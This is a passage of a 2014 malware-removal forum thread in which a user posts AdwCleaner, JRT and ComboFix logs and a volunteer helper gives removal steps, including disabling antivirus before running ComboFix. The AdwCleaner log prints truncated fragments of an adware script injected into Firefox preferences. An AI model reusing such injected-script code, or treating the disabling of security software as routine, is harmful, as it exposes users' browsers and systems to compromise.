I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#7 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 19 March 2014 - 07:28 PM

# AdwCleaner v3.022 - Report created 20/03/2014 at 10:20:12
# Updated 13/03/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Paulette - PAULETTE-PC
# Running from : C:\Users\Paulette\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.16521

-\\ Mozilla Firefox v27.0.1 (en-US)

[ File : C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c4z3ik3q.default\prefs.js ]

[ File : C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\prefs.js ]

Line Deleted : user_pref("extensions.HQvqRcD.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.ind[...]
Line Deleted : user_pref("extensions.Rov.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf[...]

Hi Gringo

 

I realise that I can only use internet explorer

 

The problem seems to only occur while using firefox

 

-\\ Google Chrome v33.0.1750.154

[ File : C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\preferences ]

*************************

AdwCleaner[R0].txt - [6172 octets] - [17/03/2014 12:39:59]
AdwCleaner[R1].txt - [1770 octets] - [20/03/2014 10:04:50]
AdwCleaner[R2].txt - [1696 octets] - [20/03/2014 10:19:15]
AdwCleaner[S0].txt - [6143 octets] - [17/03/2014 12:43:31]
AdwCleaner[S1].txt - [1837 octets] - [20/03/2014 10:05:54]
AdwCleaner[S2].txt - [1621 octets] - [20/03/2014 10:20:12]

########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [1681 octets] ##########



#8 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 19 March 2014 - 07:58 PM

Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.2 (02.20.2014:1)
OS: Windows 7 Home Premium x64
Ran by Paulette on Thu 20/03/2014 at 10:35:33.80
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\sparktrust

 

~~~ Files

 

~~~ Folders

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 20/03/2014 at 10:46:32.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#9 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 22 March 2014 - 04:01 AM


Hello Paulie67

I Would like you to do the following.

Please print out or make a copy in notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

Run Combofix:

You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)

Before you run Combofix I will need you to turn off any security software you have running, If you do not know how to do this you can find out >here< or >here<

Combofix may need to reboot your computer more than once to do its job this is normal.

You can download Combofix from one of these links. I want you to save it to the desktop and run it from there.1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall

Note 2: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." Please restart the computer

"information and logs"
  • In your next post I need the following
  • Log from Combofix
  • let me know of any problems you may have had
  • How is the computer doing now?
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#10 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 24 March 2014 - 09:49 PM

Hi Gringo, I have run the combo fix,, that you so much for your assistance.. Following is the report that came after combo fix ran

 

ComboFix 14-03-24.01 - Paulette 25/03/2014   8:12.1.4 - x64
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.61.1033.18.2047.584 [GMT 10:00]
Running from: c:\users\Paulette\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AV: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
FW: avast! Antivirus *Disabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
SP: avast! Antivirus *Disabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
SP: AVG AntiVirus Free Edition 2014 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\bootstrap.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\chrome.manifest
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\content\bg.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\kf@hprqfobf.co.uk\install.rdf
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\bootstrap.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\chrome.manifest
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\content\bg.js
c:\users\Guest\AppData\Roaming\Mozilla\Firefox\Profiles\pdc6o6bk.default\extensions\pcuoiu@ho-eqn.co.uk\install.rdf
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\bootstrap.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\chrome.manifest
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\content\bg.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\kf@hprqfobf.co.uk\install.rdf
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\bootstrap.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\chrome.manifest
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\content\bg.js
c:\users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\extensions\pcuoiu@ho-eqn.co.uk\install.rdf
.
.
(((((((((((((((((((((((((   Files Created from 2014-02-24 to 2014-03-24  )))))))))))))))))))))))))))))))
.
.
2014-03-24 23:11 . 2014-03-24 23:11 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-03-24 23:11 . 2014-03-24 23:11 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-03-18 14:41 . 2014-03-19 21:58 -------- d-----w- C:\FRST
2014-03-17 03:09 . 2014-03-17 03:09 -------- d-----w- c:\windows\ERUNT
2014-03-17 02:39 . 2014-03-20 00:20 -------- d-----w- C:\AdwCleaner
2014-03-17 01:12 . 2014-03-17 01:12 -------- d-----w- c:\program files (x86)\Common Files\SparkTrust
2014-03-16 05:22 . 2014-03-16 05:22 440672 ----a-w- c:\windows\system32\drivers\aswndisflt.sys
2014-03-16 05:19 . 2014-03-16 05:19 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVAST Software
2014-03-15 23:06 . 2014-03-15 23:06 80184 ----a-w- c:\windows\system32\drivers\aswStm.sys
2014-03-15 23:06 . 2014-03-15 23:06 207904 ----a-w- c:\windows\system32\drivers\aswVmm.sys
2014-03-15 23:06 . 2014-03-15 23:06 65776 ----a-w- c:\windows\system32\drivers\aswRvrt.sys
2014-03-15 23:06 . 2014-03-15 23:06 421704 ----a-w- c:\windows\system32\drivers\aswSP.sys
2014-03-15 23:06 . 2014-03-15 23:06 1038072 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2014-03-15 23:06 . 2014-03-15 23:06 92544 ----a-w- c:\windows\system32\drivers\aswRdr2.sys
2014-03-15 23:06 . 2014-03-15 23:06 78648 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2014-03-15 23:06 . 2014-03-15 23:06 28184 ----a-w- c:\windows\system32\drivers\aswKbd.sys
2014-03-15 23:06 . 2014-03-15 23:06 334136 ----a-w- c:\windows\system32\aswBoot.exe
2014-03-15 23:06 . 2014-03-15 23:06 43152 ----a-w- c:\windows\avastSS.scr
2014-03-15 23:05 . 2014-03-15 23:05 -------- d-----w- c:\program files\AVAST Software
2014-03-15 23:02 . 2014-03-15 23:02 -------- d-----w- c:\programdata\AVAST Software
2014-03-12 22:58 . 2014-02-04 02:32 624128 ----a-w- c:\windows\system32\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:04 509440 ----a-w- c:\windows\SysWow64\qedit.dll
2014-03-12 22:58 . 2014-02-04 02:32 1424384 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-03-12 22:58 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\SysWow64\WindowsCodecs.dll
2014-03-09 23:02 . 2014-03-09 23:02 -------- d-----w- c:\users\Paulette\AppData\Roaming\Malwarebytes
2014-03-09 22:00 . 2014-03-10 03:20 -------- d-----w- c:\users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-09 03:27 . 2013-12-17 23:38 40248 ----a-w- c:\windows\system32\TURegOpt.exe
2014-03-09 03:27 . 2013-12-17 23:38 29496 ----a-w- c:\windows\system32\authuitu.dll
2014-03-09 03:27 . 2013-12-17 23:38 25400 ----a-w- c:\windows\SysWow64\authuitu.dll
2014-03-09 03:27 . 2014-03-09 03:27 -------- d-----w- c:\users\Paulette\AppData\Roaming\AVG
2014-03-09 03:25 . 2014-03-09 03:29 -------- d-----w- c:\programdata\AVG
2014-03-09 03:25 . 2014-03-09 03:33 -------- d-sh--w- c:\programdata\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-02-28 00:28 . 2014-03-15 21:29 -------- d-----w- c:\program files (x86)\MediaViewV1
2014-02-24 23:17 . 2014-02-24 23:17 -------- d-----w- c:\program files (x86)\MediaViewerV1
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-19 10:46 . 2014-01-20 11:20 90015360 ----a-w- c:\windows\system32\MRT.exe
2014-03-12 21:17 . 2014-02-06 09:45 71048 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 21:17 . 2014-02-06 09:45 692616 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-01-29 22:57 . 2014-01-29 22:57 194048 ----a-w- c:\windows\SysWow64\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 645120 ----a-w- c:\windows\SysWow64\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 235008 ----a-w- c:\windows\system32\elshyph.dll
2014-01-29 22:56 . 2014-01-29 22:56 71680 ----a-w- c:\windows\SysWow64\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 182272 ----a-w- c:\windows\SysWow64\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\SysWow64\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 34816 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 337408 ----a-w- c:\windows\SysWow64\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 24576 ----a-w- c:\windows\SysWow64\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 151552 ----a-w- c:\windows\SysWow64\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 139264 ----a-w- c:\windows\SysWow64\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 1051136 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 61952 ----a-w- c:\windows\SysWow64\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 36352 ----a-w- c:\windows\SysWow64\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\SysWow64\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\SysWow64\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 74240 ----a-w- c:\windows\SysWow64\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\SysWow64\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 111616 ----a-w- c:\windows\SysWow64\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 942592 ----a-w- c:\windows\system32\jsIntl.dll
2014-01-29 22:56 . 2014-01-29 22:56 86016 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe
2014-01-29 22:56 . 2014-01-29 22:56 247808 ----a-w- c:\windows\system32\msls31.dll
2014-01-29 22:56 . 2014-01-29 22:56 90112 ----a-w- c:\windows\system32\SetIEInstalledDate.exe
2014-01-29 22:56 . 2014-01-29 22:56 52224 ----a-w- c:\windows\system32\msfeedsbs.dll
2014-01-29 22:56 . 2014-01-29 22:56 13312 ----a-w- c:\windows\system32\msfeedssync.exe
2014-01-29 22:56 . 2014-01-29 22:56 131072 ----a-w- c:\windows\system32\IEAdvpack.dll
2014-01-29 22:56 . 2014-01-29 22:56 48640 ----a-w- c:\windows\system32\mshtmler.dll
2014-01-29 22:56 . 2014-01-29 22:56 105984 ----a-w- c:\windows\system32\iesysprep.dll
2014-01-29 22:56 . 2014-01-29 22:56 77312 ----a-w- c:\windows\system32\tdc.ocx
2014-01-29 22:56 . 2014-01-29 22:56 40448 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-01-29 22:56 . 2014-01-29 22:56 616104 ----a-w- c:\windows\system32\ieapfltr.dat
2014-01-29 22:56 . 2014-01-29 22:56 453120 ----a-w- c:\windows\system32\dxtmsft.dll
2014-01-29 22:56 . 2014-01-29 22:56 413696 ----a-w- c:\windows\system32\html.iec
2014-01-29 22:56 . 2014-01-29 22:56 296960 ----a-w- c:\windows\system32\dxtrans.dll
2014-01-29 22:56 . 2014-01-29 22:56 81408 ----a-w- c:\windows\system32\icardie.dll
2014-01-29 22:56 . 2014-01-29 22:56 235520 ----a-w- c:\windows\system32\url.dll
2014-01-29 22:56 . 2014-01-29 22:56 1228800 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-01-29 22:56 . 2014-01-29 22:56 263376 ----a-w- c:\windows\system32\iedkcs32.dll
2014-01-29 22:56 . 2014-01-29 22:56 84992 ----a-w- c:\windows\system32\mshtmled.dll
2014-01-29 22:56 . 2014-01-29 22:56 30208 ----a-w- c:\windows\system32\licmgr10.dll
2014-01-29 22:56 . 2014-01-29 22:56 243200 ----a-w- c:\windows\system32\webcheck.dll
2014-01-29 22:56 . 2014-01-29 22:56 101376 ----a-w- c:\windows\system32\inseng.dll
2014-01-29 22:56 . 2014-01-29 22:56 167424 ----a-w- c:\windows\system32\iexpress.exe
2014-01-29 22:56 . 2014-01-29 22:56 143872 ----a-w- c:\windows\system32\wextract.exe
2014-01-29 22:56 . 2014-01-29 22:56 62464 ----a-w- c:\windows\system32\pngfilt.dll
2014-01-29 22:56 . 2014-01-29 22:56 147968 ----a-w- c:\windows\system32\occache.dll
2014-01-29 22:56 . 2014-01-29 22:56 13824 ----a-w- c:\windows\system32\mshta.exe
2014-01-29 22:56 . 2014-01-29 22:56 774144 ----a-w- c:\windows\system32\jscript.dll
2014-01-29 22:56 . 2014-01-29 22:56 83968 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-01-29 22:56 . 2014-01-29 22:56 48128 ----a-w- c:\windows\system32\imgutil.dll
2014-01-29 22:56 . 2014-01-29 22:56 135680 ----a-w- c:\windows\system32\iepeers.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 5632 ---ha-w- c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 4096 ---ha-w- c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 3072 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 522752 ----a-w- c:\windows\system32\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 364544 ----a-w- c:\windows\SysWow64\XpsGdiConverter.dll
2014-01-29 07:53 . 2014-01-29 07:53 3584 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2776576 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 2560 ---ha-w- c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 2284544 ----a-w- c:\windows\SysWow64\msmpeg2vdec.dll
2014-01-29 07:53 . 2014-01-29 07:53 1682432 ----a-w- c:\windows\system32\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 1158144 ----a-w- c:\windows\SysWow64\XpsPrint.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\SysWow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 10752 ---ha-w- c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-01-29 07:53 . 2014-01-29 07:53 604160 ----a-w- c:\windows\SysWow64\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 363008 ----a-w- c:\windows\system32\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 249856 ----a-w- c:\windows\SysWow64\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 220160 ----a-w- c:\windows\SysWow64\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 207872 ----a-w- c:\windows\SysWow64\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 1643520 ----a-w- c:\windows\system32\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 161792 ----a-w- c:\windows\SysWow64\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 1247744 ----a-w- c:\windows\SysWow64\DWrite.dll
2014-01-29 07:53 . 2014-01-29 07:53 1175552 ----a-w- c:\windows\system32\FntCache.dll
2014-01-29 07:53 . 2014-01-29 07:53 1080832 ----a-w- c:\windows\SysWow64\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 296960 ----a-w- c:\windows\system32\d3d10core.dll
2014-01-29 07:53 . 2014-01-29 07:53 1238528 ----a-w- c:\windows\system32\d3d10.dll
2014-01-29 07:53 . 2014-01-29 07:53 333312 ----a-w- c:\windows\system32\d3d10_1core.dll
2014-01-29 07:53 . 2014-01-29 07:53 245248 ----a-w- c:\windows\system32\WindowsCodecsExt.dll
2014-01-29 07:53 . 2014-01-29 07:53 194560 ----a-w- c:\windows\system32\d3d10_1.dll
2014-01-29 07:53 . 2014-01-29 07:53 648192 ----a-w- c:\windows\system32\d3d10level9.dll
2014-01-29 07:53 . 2014-01-29 07:53 293376 ----a-w- c:\windows\SysWow64\dxgi.dll
2014-01-29 07:53 . 2014-01-29 07:53 221184 ----a-w- c:\windows\system32\UIAnimation.dll
2014-01-29 07:53 . 2014-01-29 07:53 187392 ----a-w- c:\windows\SysWow64\UIAnimation.dll
2014-01-25 22:46 . 2009-07-14 02:36 175616 ----a-w- c:\windows\system32\msclmd.dll
2014-01-25 22:46 . 2009-07-14 02:36 152576 ----a-w- c:\windows\SysWow64\msclmd.dll
2014-01-21 01:03 . 2010-06-24 01:33 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1AMPCBOK]
@="{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}"
[HKEY_CLASSES_ROOT\CLSID\{04cd1f3e-81d5-4904-a3ab-e0f99a7d769d}]
2010-11-05 01:58 297808 ----a-w- c:\windows\System32\mscoree.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-09-08 98304]
"AVG_UI"="c:\program files (x86)\AVG\AVG2014\avgui.exe" [2013-11-07 4956176]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2013-09-13 59720]
"EEventManager"="c:\program files (x86)\Epson Software\Event Manager\EEventManager.exe" [2009-12-03 976320]
"AvastUI.exe"="c:\program files\AVAST Software\Avast\AvastUI.exe" [2014-03-15 3767096]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ    sasnative64\0autocheck autochk *
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\run-]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe"
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files (x86)\AVG\AVG2014\avgidsagent.exe;c:\program files (x86)\AVG\AVG2014\avgidsagent.exe [x]
R2 BBSvc;Bing Bar Update Service;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE;c:\program files (x86)\Microsoft\BingBar\BBSvc.EXE [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms;c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 aswRvrt;avast! Revert; [x]
S0 aswVmm;avast! VM Monitor; [x]
S0 AVGIDSHA;AVGIDSHA;c:\windows\system32\DRIVERS\avgidsha.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsha.sys [x]
S0 Avgloga;AVG Logging Driver;c:\windows\system32\DRIVERS\avgloga.sys;c:\windows\SYSNATIVE\DRIVERS\avgloga.sys [x]
S0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\DRIVERS\avgmfx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgmfx64.sys [x]
S0 Avgrkx64;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgrkx64.sys [x]
S1 aswKbd;aswKbd;c:\windows\system32\drivers\aswKbd.sys;c:\windows\SYSNATIVE\drivers\aswKbd.sys [x]
S1 aswNdisFlt;Avast! Firewall Driver;c:\windows\system32\DRIVERS\aswNdisFlt.sys;c:\windows\SYSNATIVE\DRIVERS\aswNdisFlt.sys [x]
S1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys;c:\windows\SYSNATIVE\drivers\aswSnx.sys [x]
S1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys;c:\windows\SYSNATIVE\drivers\aswSP.sys [x]
S1 Avgdiska;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiska.sys;c:\windows\SYSNATIVE\DRIVERS\avgdiska.sys [x]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdrivera.sys;c:\windows\SYSNATIVE\DRIVERS\avgidsdrivera.sys [x]
S1 Avgldx64;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx64.sys;c:\windows\SYSNATIVE\DRIVERS\avgldx64.sys [x]
S1 Avgtdia;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdia.sys;c:\windows\SYSNATIVE\DRIVERS\avgtdia.sys [x]
